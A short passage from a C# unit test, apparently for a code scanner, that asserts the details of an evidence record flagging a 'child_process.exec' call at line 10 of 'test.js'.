Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("test.js", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:child_process.exec", langEvidence.Value);
}
#endregion
}